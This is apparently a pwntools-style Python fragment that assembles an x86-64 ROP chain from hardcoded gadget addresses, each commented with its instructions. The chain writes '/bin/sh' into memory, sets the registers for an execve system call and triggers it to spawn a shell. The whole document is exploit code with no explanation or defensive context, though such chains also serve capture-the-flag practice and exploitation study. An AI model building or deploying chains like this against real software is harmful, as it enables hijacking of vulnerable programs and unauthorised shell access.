payload = p64(0x44044e)
#0x000000000044044e: pop rcx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x57340d)+p64(0x52143b)
# 0x000000000052143b: pop rax; ret; 
payload += p64(0x4017d1)+p64(0x47bb46)
# 0x000000000047bb46: lea r8, [rbp - 0x1320]; call rax; 
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x5069f2)
# 0x00000000005069f2: add qword ptr [r8 - 0x7d], rcx; ret; 
payload += p64(0x52143b)
# 0x000000000052143b: pop rax; ret; 
payload += p64(0x4017d3)+p64(0x44fc54)
# 0x000000000044fc54: xor edx, edx; pop rbp; jmp rax; 
payload += p64(0x0)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x572070)+p64(0x4ebb4b)
# 0x00000000004ebb4b: pop rsi; ret; 
payload += p64(0x0)+p64(0x52143b)
# 0x000000000052143b: pop rax; ret; 
payload += p64(0x3b)+p64(0x4495a2)
# 0x00000000004495a2: syscall; 
payload += b''
